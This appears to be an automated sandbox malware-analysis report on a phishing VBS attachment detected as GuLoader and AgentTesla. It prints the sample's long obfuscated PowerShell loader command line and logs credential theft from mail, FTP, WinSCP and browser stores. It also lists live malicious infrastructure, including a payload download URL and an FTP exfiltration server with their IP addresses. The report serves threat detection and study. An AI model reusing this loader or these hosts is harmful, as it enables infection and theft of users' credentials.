Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_00EF44F2 bind, 17_2_00EF44F2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_00EF44CD bind, 17_2_00EF44CD
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 755275 Sample: Ordine n.47201 pdf.vbs Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 40 Snort IDS alert for network traffic 2->40 42 Multi AV Scanner detection for domain / URL 2->42 44 Yara detected GuLoader 2->44 46 4 other signatures 2->46 8 wscript.exe 1 1 2->8         started        process3 signatures4 56 VBScript performs obfuscated calls to suspicious functions 8->56 58 Wscript starts Powershell (via cmd or directly) 8->58 60 Obfuscated command line found 8->60 62 Very long command line found 8->62 11 powershell.exe 20 8->11         started        15 cmd.exe 1 8->15         started        process5 file6 32 C:\Users\user\AppData\...\i3ontxzb.cmdline, Unicode 11->32 dropped 64 Tries to detect Any.run 11->64 17 CasPol.exe 15 12 11->17         started        21 csc.exe 3 11->21         started        24 conhost.exe 11->24         started        26 conhost.exe 15->26         started        signatures7 process8 dnsIp9 34 ftp.mcmprint.net 185.31.121.136, 21, 49725, 49726 RAX-ASBG Bulgaria 17->34 36 qwedft.gq 162.240.62.179, 49722, 80 UNIFIEDLAYER-AS-1US United States 17->36 38 2 other IPs or domains 17->38 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->48 50 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->50 52 May check the online IP address of the machine 17->52 54 5 other signatures 17->54 30 C:\Users\user\AppData\Local\...\i3ontxzb.dll, PE32 21->30 dropped 28 cvtres.exe 1 21->28         started        file10 signatures11 process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.240.62.179
 qwedft.gq United States
46606 UNIFIEDLAYER-AS-1US false
52.20.78.240
 api.ipify.org.herokudns.com United States
14618 AMAZON-AESUS false
185.31.121.136
 ftp.mcmprint.net Bulgaria
199364 RAX-ASBG true

Contacted Domains

Name IP Active
api.ipify.org.herokudns.com 52.20.78.240 true
qwedft.gq 162.240.62.179 true
ftp.mcmprint.net 185.31.121.136 true
api.ipify.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    http://qwedft.gq/Akkant/bwqPIdZhEA125.psm false
    • Avira URL Cloud: safe
    		 unknown